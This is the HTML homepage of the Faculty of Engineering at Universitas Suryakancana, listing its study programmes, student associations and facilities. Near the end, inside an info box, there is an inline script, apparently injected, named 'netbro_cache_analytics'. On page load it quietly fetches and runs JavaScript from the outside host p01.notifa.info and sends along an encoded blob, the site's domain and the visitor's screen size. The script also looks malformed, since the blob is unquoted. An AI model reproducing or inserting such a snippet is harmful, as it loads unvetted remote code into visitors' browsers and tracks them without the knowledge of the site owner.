
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Fakultas Teknik Universitas Suryakancana</title>
	<link rel="stylesheet" type="text/css" href="http://ft.unsur.ac.id/dist/css/fonts.css">
	<link rel="stylesheet" type="text/css" href="http://ft.unsur.ac.id/dist/css/bootstrap.min.css">
	<link rel="stylesheet" type="text/css" type="text/css" href="http://ft.unsur.ac.id/dist/css/font-awesome.min.css">
	
		
	<link rel="stylesheet" href="http://ft.unsur.ac.id/dist/css/style.css">
	<link href="http://ft.unsur.ac.id/dist/images/favicon.ico" rel="shortcut icon" type="image/ico" />
</head>
<body>
<div class="wrapper">
<div class="top-content">
	<nav id="navbar-example" class="navbar navbar-default navbar-static" role="navigation">
			<div class="navbar-header">
				<div class="container">
					<div class="row">
						<div class="col-sm-4 no-padding">
							<button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target=".bs-example-js-navbar-collapse">
								<span class="sr-only">Toggle navigation</span>
								<span class="icon-bar"></span>
								<span class="icon-bar"></span>
								<span class="icon-bar"></span>
							</button>
							<a href="http://ft.unsur.ac.id/" class="navbar-brand"><img src="http://ft.unsur.ac.id/dist/images/logo.png" alt="" /></a>							</div>
						<div class="col-sm-8 hidden-xs">
							<ul class="contact-info pull-right">
								<li>
									<i class="fa fa-phone"></i>
									<p> <span>Call us</span><br>
									(0263) 283578</p>
								</li>
								<li>
									<i class="fa fa-envelope"></i>
									<p><span>Email Us</span><br>
									 info@ftunsur.ac.id</p>
								</li>
							</ul>
						</div>
					</div>
				</div>
			</div>
			<div class="collapse navbar-collapse bs-example-js-navbar-collapse">
				<div class="container">
					<div class="row">
						<ul class="nav navbar-nav">
							<li><a href="http://ft.unsur.ac.id/"><i class="glyphicon glyphicon-home"></i> Beranda</a></li>
							<li class="dropdown">
								<a id="drop1" href="#" role="button" class="dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">Profil <b class="caret"></b></a>
								<ul class="dropdown-menu" aria-labelledby="drop1">
																	<li><a href="http://ft.unsur.ac.id/profil/sambutan.html">Sambutan</a></li>
																	<li><a href="http://ft.unsur.ac.id/profil/sejarah.html">Sejarah</a></li>
																</ul>
							</li>
							<li class="dropdown">
								<a href="#" id="drop2" role="button" class="dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">Program Studi <b class="caret"></b></a>
								<ul class="dropdown-menu" aria-labelledby="drop2">
																	<li><a href="http://ft.unsur.ac.id/prodi/teknik-industri.html">Teknik Industri</a></li>
																	<li><a href="http://ft.unsur.ac.id/prodi/teknik-informatika.html">Teknik Informatika</a></li>
																	<li><a href="http://ft.unsur.ac.id/prodi/teknik-sipil.html">Teknik Sipil</a></li>
																</ul>
							</li>
							<li><a href="http://ft.unsur.ac.id/e-dokumen.html">E Dokumen</a></li>
							<li><a href="http://ft.unsur.ac.id/berita.html">Berita</a></li>
							<li><a href="http://ft.unsur.ac.id/pedoman-akademik.html">Pedoman Akademik</a></li>
						</ul>
						<ul class="nav navbar-nav navbar-right">
							<li>
													<a href="http://ft.unsur.ac.id/akademik/login.html" target="_blank"><i class="glyphicon glyphicon-log-in"></i> Login</a>
													</li>
						</ul>
					</div>
				</div>
			</div>
		</div>
	</nav>
</div>
<div id="carousel-example-generic" class="carousel slide" data-ride="carousel">
	<ol class="carousel-indicators">
			<li data-target="#carousel-example-generic" data-slide-to="0" class="active"></li>
			<li data-target="#carousel-example-generic" data-slide-to="1" ></li>
			<li data-target="#carousel-example-generic" data-slide-to="2" ></li>
		</ol>
	<div class="carousel-inner">
			<div class="item active">
			<img alt="FAKULTAS TEKNIK" src="">
						<div class="carousel-caption">
			              <h2>FAKULTAS TEKNIK</h2>
						              <p>Fakultas Teknik Universitas Suryakancana Menyelenggarakaan Program Pendidikan Strata-1(S1) Program Studi Teknik Sipil, Teknik Industri dan Teknik Informatika.</p>
			            </div>
					</div>
			<div class="item">
			<img alt="HIMPUNAN MAHASISWA" src="">
						<div class="carousel-caption">
			              <h2>HIMPUNAN MAHASISWA</h2>
						              <p>* Himpunan Mahasiswa Teknik Sipil
* Himpunan Mahasiswa Teknik Industri
* Himpunan Mahasiswa Teknik Informatika</p>
			            </div>
					</div>
			<div class="item">
			<img alt="FASILITAS" src="">
						<div class="carousel-caption">
			              <h2>FASILITAS</h2>
						              <p>Gedung Kuliah | Laboratorium | Perpustakaan | Mushola | Ruang Studio | Aula | Free Wifi Area | Area Parkir</p>
			            </div>
					</div>
		</div>
	<a class="left carousel-control" href="#carousel-example-generic" data-slide="prev">
		<span class="fa fa-angle-left"></span>
	</a>
	<a class="right carousel-control" href="#carousel-example-generic" data-slide="next">
		<span class="fa fa-angle-right"></span>
	</a>
</div>
<div class="container">
	<div class="row">
	  <div class="col-sm-12">
						  <div class="alert alert-info" style="margin-top: 15px">
					<a href="http://ft.unsur.ac.id/info/jadwal-pelaksaan-seminar-kerja-praktek.html"><i class="fa fa-info fa-fw"></i></a>
					<script type="text/javascript" src="http://ft.unsur.ac.id/dist/js/bootstrap.min.js"></script>
                    <script type="text/javascript" src="http://ft.unsur.ac.id/dist/js/scroll-nav-fixed.js"></script>
                    <script type="text/javascript" src="http://ft.unsur.ac.id/dist/js/jquery.matchHeight.min.js"></script>

                    <script type="text/javascript">
	$(document).ready(function() {
		$(document).scrollNavFixed();
		$('#back-top').backTop();
		$('.item').matchHeight();
		$('.tooltips').tooltip();

		
	    
	});
                    </script>
                    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2XIfeLPYWEIb%2bC28uUVq8tLNHiCVmmLXTWdck%2faXLBfxTxlRNxDVDi8TVlgaL9Xkkn1wVBIWg3a6zCFidypUccKp7hZS5iyPwh9vexXI5vTW9Xf6zRk%2bbzvzHpoTh2GuPxAUTzLoW6pjf%2bD3Bx2zpTcUs8gzkPnInlDOTltpqTiP29Vvq%2fvGqmLIHBhU65vu5JUeObqrmMRv1qRc5S5NZSaKif%2baLC1if6EnfGJ4wGxAVm1Yy6Rbq%2bxFOilsLapcV79fdo3X5F%2b1Nafo3fICEWqND%2fmbgKvo2V%2b1CfPX60svSP9kLB%2fzXl1cEwYaV1uADZZ1LHR00UFrMWNTwP%2fa8%2bWiw3tFOvRu4o25xU8OayHSnXrcwgGkKQHNxkJihUFak6Jf8Pkg2ENcc9QaXDfrQlyyi7IfSS9WNLaCoyUboLhdQT760GxrxUTEmS%2f4LGl%2fYeHxUVkZrI%2bbWwh4hzwVnJl6nNfQqep7VcEqH6jOqwsLI5PHusvV8by9uMVfOZc1XozwUFksBWNg%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
				  </div>
					</div>
	</div>
</div>
</body>
</html>